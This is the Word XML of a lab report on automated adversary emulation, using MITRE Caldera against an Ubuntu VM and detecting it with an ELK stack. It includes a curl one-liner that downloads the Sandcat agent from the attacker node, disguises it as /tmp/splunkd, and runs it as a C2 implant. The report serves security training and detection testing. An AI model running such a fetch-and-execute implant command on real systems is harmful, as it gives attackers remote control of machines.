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968E" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1440" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Automated Adversary Emulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F195D5" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>and Detection Lab Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170DFAD3" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>MITRE Caldera v5.3.0 + ELK Stack v8.19.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5C4074" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Date: May 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E07" w14:paraId="4C1524E4" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280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20" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="042166C7" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attacker Node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70A275" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Kali Linux — 192.168.17.128  (MITRE Caldera :8888)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6E07" w14:paraId="3DF619DA" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280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20" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6235161E" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Victim Node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9E6E31" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ubuntu Linux — 192.168.17.130  (Sandcat Agent + Filebeat)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6E07" w14:paraId="58467C7E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280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20" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="254AA80C" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SIEM Node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1DA4C2" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Debian 13 — 192.168.10.8  (Elasticsearch :9200, Kibana :5601)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6E07" w14:paraId="0A5C0AD8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280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20" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2322DBB2" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Operation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53010D" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Initial_Discovery_Test  |  Adversary: Discovery  |  Planner: atomic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0818C003" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="388AE7C4" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="000000"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EA1847" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>This report documents the implementation of an automated adversary emulation lab using MITRE Caldera as the C2 framework and the ELK Stack as the SIEM platform. A Sandcat agent was deployed on the Ubuntu victim node and confirmed trusted in the Caldera dashboard. The Discovery adversary profile executed reconnaissance techniques mapped to MITRE ATT&amp;CK, with T1033 and T1087 completing successfully. ELK Stack was fully operational; however, process-level detection was not achieved due to a missing auditd configuration on the victim — a realistic gap that is documented and remediated in this report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B23FFA" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="000000"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>2. Phase 2 — Caldera Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4D07AC" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 Installation (Kali Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492C57FB" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Caldera was cloned from GitHub, Python dependencies installed, the Magma Vue UI built, and the server started in insecure mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453813D2" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>git clone https://github.com/mitre/caldera.git --recursive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135D3EC0" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pip3 install -r requirements.txt --break-system-packages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3D0EF5" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cd plugins/magma &amp;&amp; npm install --legacy-peer-deps &amp;&amp; npm run build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7073CA95" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>python3 server.py --insecure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252FA074" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Server confirmed: All systems ready. Active plugins: sandcat, stockpile, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fieldmanual</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, response, magma.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B4388B" w14:textId="1B9F173A" w:rsidR="009A2D5C" w:rsidRPr="009A2D5C" w:rsidRDefault="009A2D5C">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="414ADD11" wp14:editId="38E63949">
            <wp:extent cx="5943600" cy="2447170"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="Img11"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="11" name="Img11"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2447170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2B5264" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 Sandcat Agent on Ubuntu Victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C048E69" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>The following one-liner was generated by the Caldera UI (Agents &gt; Deploy an Agent &gt; Sandcat &gt; Linux) and executed on the Ubuntu victim:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D821F1" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>server="http://192.168.17.128:8888"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9B058D" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>curl -s -X POST -H "file:sandcat.go" -H "platform:linux" -H "architecture:amd64" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4930B462" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  $server/file/download &gt; /tmp/splunkd &amp;&amp; chmod +x /tmp/splunkd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C84FC59" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/tmp/splunkd -server $server -group red -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D1DFFD" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>The agent immediately reported: [+] Beacon (HTTP): ALIVE, confirming the C2 channel to Caldera on port 8888.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428AB7EA" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="006A6E07">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51631534" w14:textId="77777777" w:rsidR="008829F9" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ubuntu-virtual-machine shows alive, trusted status. Agent ID avuvoq, Linux, HTTP contact confirmed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DAB219" w14:textId="77777777" w:rsidR="009A2D5C" w:rsidRDefault="009A2D5C"/>
    <w:p w14:paraId="33F6D685" w14:textId="4AC4CADC" w:rsidR="009A2D5C" w:rsidRDefault="009A2D5C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AA72D04" wp14:editId="2A0C8104">
            <wp:extent cx="5943600" cy="3131737"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="Img12"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="12" name="Img12"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3131737"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="069CDC87" w14:textId="77777777" w:rsidR="009A2D5C" w:rsidRDefault="009A2D5C"/>
    <w:p w14:paraId="73512E46" w14:textId="779F586C" w:rsidR="009A2D5C" w:rsidRDefault="009A2D5C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37101E39" wp14:editId="54A03B65">
            <wp:extent cx="5943600" cy="2876027"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="13" name="Img13"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="13" name="Img13"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2876027"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDFB869" w14:textId="77777777" w:rsidR="009A2D5C" w:rsidRDefault="009A2D5C"/>
    <w:p w14:paraId="214A0FB1" w14:textId="3148AB94" w:rsidR="009A2D5C" w:rsidRDefault="009A2D5C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BEB2209" wp14:editId="46B48B98">
            <wp:extent cx="5943600" cy="3768180"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="14" name="Img14"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="14" name="Img14"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3768180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB7CA93" w14:textId="77777777" w:rsidR="009A2D5C" w:rsidRDefault="009A2D5C"/>
    <w:p w14:paraId="0F5F1CB9" w14:textId="4EDDA8CB" w:rsidR="009A2D5C" w:rsidRDefault="009A2D5C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28A14771" wp14:editId="0C27CC28">
            <wp:extent cx="5943600" cy="2719865"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="19" name="Img19"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="19" name="Img19"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2719865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D064C4" w14:textId="77777777" w:rsidR="009A2D5C" w:rsidRDefault="009A2D5C"/>
    <w:p w14:paraId="573D23AC" w14:textId="5F8E7405" w:rsidR="009A2D5C" w:rsidRDefault="009A2D5C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7705CB4A" wp14:editId="128972F9">
            <wp:extent cx="5943600" cy="1809311"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="20" name="Img20"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="20" name="Img20"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1809311"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD32801" w14:textId="77777777" w:rsidR="009A2D5C" w:rsidRDefault="009A2D5C"/>
    <w:p w14:paraId="21FDF719" w14:textId="77777777" w:rsidR="009A2D5C" w:rsidRDefault="009A2D5C"/>
    <w:p w14:paraId="5C813953" w14:textId="6480FEB1" w:rsidR="009A2D5C" w:rsidRDefault="009A2D5C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43B7A876" wp14:editId="47232C87">
            <wp:extent cx="5943600" cy="1209196"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="Img21"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="21" name="Img21"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1209196"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0705767D" w14:textId="77777777" w:rsidR="009A2D5C" w:rsidRDefault="009A2D5C"/>
    <w:p w14:paraId="61313E63" w14:textId="77777777" w:rsidR="0008722F" w:rsidRDefault="0008722F" w:rsidP="0008722F">
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="642EE991" wp14:editId="5224CC21">
            <wp:extent cx="6000750" cy="3032760"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="161569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7695" cy="3041324"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Caldera Agents Tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39333548" w14:textId="77777777" w:rsidR="0008722F" w:rsidRDefault="0008722F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="000000"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C8FD269" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="000000"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>3. Phase 3 — Operation Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3487FC62" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Operation Initial_Discovery_Test was created with the Discovery adversary profile, atomic planner, and the red group. The operation ran autonomously against the ubuntu-virtual-machine agent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEA075A" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.1 TTP Execution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600"/>
        <w:gridCol w:w="2760"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A6E07" w14:paraId="2985A835"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333333"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3028FA0A" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Time (EDT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F0D0C27" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="AAAAAA"/>
